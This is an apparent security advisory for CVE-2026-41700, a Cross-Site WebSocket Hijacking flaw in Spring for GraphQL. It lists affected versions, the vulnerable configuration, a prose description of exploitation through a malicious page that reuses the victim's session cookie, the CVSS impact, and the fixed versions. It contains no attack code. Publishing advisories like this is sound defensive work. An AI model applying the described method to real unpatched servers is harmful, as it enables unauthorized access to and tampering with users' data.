CVE-2026-41700

Vulnerability

Spring for GraphQL applications that have enabled the WebSocket transport are vulnerable to Cross-Site WebSocket Hijacking. The vulnerability affects versions 2.0.0 through 2.0.3, 1.4.0 through 1.4.5, 1.3.0 through 1.3.8, and 1.0.0 through 1.0.6. The application is vulnerable when it has enabled the GraphQL WebSocket transport, relies on cookie-based session authentication, and does not have custom Spring Security WebSocket-level Origin enforcement configured [1].

Exploitation

An attacker can trick an authenticated user into visiting a malicious page. The attacker then establishes a WebSocket connection to the vulnerable Spring for GraphQL server using the victim's session cookie. This allows the attacker to send arbitrary GraphQL operations over the WebSocket without needing to own valid credentials, as the victim's browser automatically attaches cookies to the WebSocket handshake [1].

Impact

A successful Cross-Site WebSocket Hijacking attack enables the attacker to execute arbitrary GraphQL operations with the victim's credentials. This can lead to unauthorized data access (confidentiality breach) and unauthorized modification or deletion of data (integrity breach). The CVSS v3.1 base score is 8.1 (High) with a vector of AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N [1].

Mitigation

Users of affected versions should upgrade to the corresponding fixed version: 2.0.x to 2.0.4, 1.4.x to 1.4.6, 1.3.x to 1.3.9 (commercial), and 1.0.x to 1.0.7 (commercial). No further mitigation steps are necessary [1].